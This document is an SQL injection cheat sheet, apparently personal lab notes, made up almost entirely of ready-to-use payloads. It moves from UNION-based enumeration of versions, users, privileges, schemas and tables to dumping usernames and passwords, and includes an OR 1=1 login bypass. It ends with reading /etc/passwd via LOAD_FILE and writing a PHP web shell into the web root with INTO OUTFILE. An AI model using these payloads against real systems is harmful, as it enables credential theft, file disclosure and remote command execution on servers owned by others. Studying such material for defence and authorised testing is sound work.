SQL Injection
' order by 1-- -
' order by 2-- -
cn' UNION select 1,2,3-- -
cn' UNION select 1,2,3,4-- -
cn' UNION select 1,@@version,3,4-- -
cn' UNION select 1,user(),3,4-- -
cn' UNION SELECT 1, user, 3, 4 from mysql.user-- -
SELECT super_priv FROM mysql.user
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- -
# Will display the privileges of the user root / change the user name as needed
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -
(Y means yes, indicating superuser privileges)
# Will display all privileges of all users
cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges-- -
# Will display the privileges held by one grantee on the databases / change the grantee as needed
cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -
# Will display the schemas/databases
cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -
# Will display the current database
cn' UNION select 1,database(),2,3-- -
# Will display tables
cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -
# Will display the columns of the table credentials
cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -
# Will display the username and password values from the table credentials
cn' UNION select 1, username, password, 4 from dev.credentials-- -
# Will display tables
id=0 UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema = database()--
# Will display the columns of the table users
id=0 UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name = 'users'--
# Will display username and password
id=0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR '<br>') FROM users
Example output:
admin:p4ssword
martin:pa$$word
jim:work123
# Will return every row, because the condition is always true
' OR 1=1;--
Example:
username: ' OR 1=1;--
password: ' OR 1=1;--
SELECT LOAD_FILE('/etc/passwd');
cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -
cn' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4-- -
cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -
cn' union select 1,'file written successfully!',3,4 into outfile '/var/www/html/proof.txt'-- -
> http://IP/proof.txt
cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -
> http://IP/shell.php?0=id (It will check the id of user)
(To find the server's web root directory, use "/usr/share/wordlists/seclists/Discovery/Web-Content/default-web-root-directory-linux.txt" or "default-web-root-directory-windows.txt")